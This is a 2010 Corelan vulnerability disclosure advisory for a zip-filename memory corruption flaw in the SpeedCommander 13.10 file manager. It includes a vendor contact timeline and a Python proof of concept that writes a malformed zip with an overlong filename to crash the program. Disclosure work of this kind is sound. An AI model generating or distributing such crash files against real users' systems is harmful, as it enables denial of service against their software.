SpeedCommander version 13.10 suffers from a memory corruption denial of service vulnerability. Exploit included.
ca3fcff87584ab42c2a2013194c68b8c234aabd62272a8f654f1f54713f24a0a
|------------------------------------------------------------------|
| __ __ |
| _________ ________ / /___ _____ / /____ ____ _____ ___ |
| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |
| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |
| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |
| |
| http://www.corelan.be:8800 |
| security@corelan.be |
| |
|-------------------------------------------------[ EIP Hunters ]--|
| |
| Vulnerability Disclosure Report |
| |
|------------------------------------------------------------------|
Advisory : CORELAN-10-028
Disclosure date : April 20th, 2010
http://www.corelan.be:8800/advisories.php?id=CORELAN-10-028
00 : Vulnerability information
Product : SpeedCommander
Version : 13.10 (latest version)
Vendor : SpeedProduct
URL : http://www.speedproject.de
Platform : Windows
Type of vulnerability : Memory Corruption Risk rating : Med Issue fixed in version : not fixed Vulnerability discovered by : TecR0c Corelan Team :
http://www.corelan.be:8800/index.php/security/corelan-team-members/
01 : Vendor description of software
"The SpeedCommander application was designed to be a comfortable file manager.
It builds on the proven two window technology and offers a multitude of exclusive features. Sort, copy, move or delete your files either using the keyboard or the mouse."
02 : Vulnerability details
A flaw in how the application handles a overly long zip filename which an attacker can utilize in a manner other than the designer intended. A memory corruption will occur which will result in a "SpeedCommander.exe encountered a problem in module CxZip61u.dll and needs to close."
03 : Author/Vendor communication
March 31th, 2010 : author contacted
April 9th, 2010 : sent reminder
April 20th, 2010 : No response, public disclosure
04: Proof of Concept
#!/usr/bin/python
# #######################################################################
# Title: Speed Commander 13.10 (.zip) Memory Corruption
# Author: TecR0c - http://tecninja.net/blog & http://twitter.com/TecR0c
# Found by: TecR0c
# Download: http://www.sp-download.de/sc13/sc13.exe
# Platform: Windows XP sp3 En
# Advisory: http://www.corelan.be:8800/advisories.php?id=CORELAN-10-028
# Greetz to: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# #######################################################################
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
# Trigger : Open the application, Browse to the zip file > double click = BOOM!
print "|------------------------------------------------------------------|"
print "| __ __ |"
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |"
print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |"
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |"
print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |"
print "| |"
print "| http://www.corelan.be:8800 |"
print "| security@corelan.be |"
print "| |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print "[+] SpeedCommander (.zip) - by TecR0c"
ldf_header = ("\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\xe4\x0f"
"\x00\x00\x00")
cdf_header = ("\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\xe4\x0f"
"\x00\x00\x00\x00\x00\x00\x01\x00"
"\x24\x00\x00\x00\x00\x00\x00\x00")
eofcdf_header = ("\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
"\x12\x10\x00\x00"
"\x02\x10\x00\x00"
"\x00\x00")
buff = "\x41" * 4064
buff += ".txt"
mefile = open('SpeedCommander.zip','w');
mefile.write(ldf_header + buff + cdf_header + buff + eofcdf_header);
mefile.close()